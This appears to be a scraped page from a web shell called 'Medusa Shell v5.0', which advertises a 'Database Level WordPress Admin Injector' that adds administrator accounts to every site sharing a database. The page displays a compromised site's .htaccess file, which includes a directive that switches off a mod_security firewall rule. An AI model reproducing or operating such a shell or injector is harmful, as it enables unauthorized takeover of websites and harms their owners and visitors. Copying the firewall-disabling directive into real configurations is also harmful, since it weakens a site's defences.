Database Level WordPress Admin Injector
Veritabanı seviyesinde çalışır. Aynı veritabanını kullanan siteleri otomatik algılar, sadece bir kez işlem yapar.
⬆️ 🔙 Go Up
<IfModule mod_security2.c>
SecRuleRemoveById 2200924
</IfModule>
# BEGIN Really Simple SSL Redirect 5.3.0
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP:CF-Visitor} '"scheme":"http"'
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
</IfModule>
# END Really Simple SSL Redirect
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
#php_value memory_limit 256M
#php_value max_execution_time 600000
#php_value upload_max_filesize 30M
🐉 Medusa Shell • v5.0 • DB Level Injection